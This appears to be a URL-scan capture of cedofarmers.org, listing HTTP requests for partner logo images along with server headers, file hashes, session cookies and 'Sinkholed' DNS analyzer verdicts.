Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:10 GMT
accept-ranges: bytes
content-length: 7970
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226064-farmradio_logo.png
192.185.57.117200 OK 8.5 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226064-farmradio_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 260 x 83, 8-bit/color RGBA, non-interlaced\012- data
Hash acbc305b30b93c9cad8a0319bc83beb2
82ac01754fd55c3b2a8536c731705c3bb5370d01
0067638d649205450369e299ebe376323fe320748a60783a0696a59102ed5fc2
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226064-farmradio_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:21:04 GMT
accept-ranges: bytes
content-length: 8523
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226219-RHSP_logo.jpg
192.185.57.117200 OK 9.6 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226219-RHSP_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90", baseline, precision 8, 350x250, components 3\012- data
Hash 2a2b582fd8bb85562958aff0652d7ce7
12b58f32d012f37e5345c597c8c09ee3fdf0998e
d05b2d85e1698a37648d2a31cf94ce693cf19fbcf10c34cd7712493e8792e0eb
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226219-RHSP_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:23:38 GMT
accept-ranges: bytes
content-length: 9556
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226049-concern_logo.png
192.185.57.117200 OK 13 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226049-concern_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced\012- data
Hash 554c7995c6fc7c2b5296488df5890258
5ddfb85c9140fb6154fd367517faab935e24ab57
754877b85cfc8583e983f4b4012570e6e7900e25ac72aaeb72b5393c73838b10
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226049-concern_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:48 GMT
accept-ranges: bytes
content-length: 12627
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226123-ISSDUganda_logo.gif
192.185.57.117200 OK 14 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226123-ISSDUganda_logo.gif
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type GIF image data, version 89a, 280 x 108\012- data
Hash a91ea5feb010fc00dc507da48df2bb08
d8bb71422001c5e5b297384972836747804cabeb
85dda7d730462d957e02f093456c1490a0337de25ba19a2a06a24a82623f347d
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226123-ISSDUganda_logo.gif HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:02 GMT
accept-ranges: bytes
content-length: 13761
content-type: image/gif
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226020-AgVerify_logo.png
192.185.57.117200 OK 13 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226020-AgVerify_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 102 x 100, 8-bit/color RGBA, non-interlaced\012- data
Hash 3a77e0e97be8d382c49a0bea0e7b96ee
97e6ae8f29a688171daf8fb0ae76227a94748486
2f5bce4713af81495b4af3268b84565aa32675d402d7520ba3366cf0dbdfb1a3
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226020-AgVerify_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:20 GMT
accept-ranges: bytes
content-length: 13108
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226212-peacecorps_logo.png
192.185.57.117200 OK 13 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226212-peacecorps_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced\012- Minix filesystem, V1 (big endian), 1140 zones\012- data
Hash 36201ea364ca857180650ef26d4c261d
be94a53efc6cfaed7440e11c3e805d31952a7194
7a17429bfe71b4562c9bceae1f22f3f54567da2528778683c428ebb65a215e07
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226212-peacecorps_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:23:32 GMT
accept-ranges: bytes
content-length: 12921
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226026-azuri_logo.png
192.185.57.117200 OK 15 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226026-azuri_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 140 x 94, 8-bit/color RGBA, non-interlaced\012- data
Hash 66294f8bd37606f90bffc393fc904580
dc5157ff63ed21fcf0436418ee9f951b23b374c9
bd91ec976f613f95b085817dccd53abb9069a01e1acf27d36c36f50f534c9792
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226026-azuri_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:26 GMT
accept-ranges: bytes
content-length: 15194
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/img/cedo_logo.png
192.185.57.117200 OK 16 kB URL HTTP/2 cedofarmers.org/img/cedo_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 300 x 94, 8-bit/color RGBA, non-interlaced\012- data
Hash b651660d68c75f78e3978f00936cb68c
a7f21fe219c254e2ae32bffdb8a6dada4d22818c
2ed1f32cd719b7a33baaa6e83983e9f3359f6a14004ad0b7b879f605f1567959
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /img/cedo_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 02 May 2019 04:07:06 GMT
accept-ranges: bytes
content-length: 15783
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226163-muk_logo.jpg
192.185.57.117200 OK 16 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226163-muk_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90", baseline, precision 8, 244x207, components 3\012- data
Hash 61b27a12a411b114288abec230530cea
fe28d81a4e39588110377c1daae4c1d3e1907334
d8709f607a3ba10f8cce62e8aed817b01560029503f8fc04654087039d4403f6
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226163-muk_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:42 GMT
accept-ranges: bytes
content-length: 16210
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226015-AgResults_logo.png
192.185.57.117200 OK 17 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604226015-AgResults_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 239 x 90, 8-bit/color RGBA, non-interlaced\012- data
Hash b940f566411a53bf2bcc5236296f4541
c433b0bd09151992a7fd93c4dd89231a73749558
40fcdd32c8646567df6634909a9ff559a7ef474f12f19c06bd2bb8578cecd66a
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226015-AgResults_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:14 GMT
accept-ranges: bytes
content-length: 17025
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604667006-SDC.png
192.185.57.117200 OK 18 kB URL HTTP/2 cedofarmers.org/uploads/partners/1604667006-SDC.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type PNG image data, 389 x 129, 8-bit/color RGBA, non-interlaced\012- data
Hash 5feaa2561972e1f1936d27afa46f8073
9a131c67f0cbdcdab6b68111d488f4ed470d19f5
4d4ac6c810b35e9bc899bbca7ea1945f34c1587b8d05de854afa1c96743fd0e0
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604667006-SDC.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
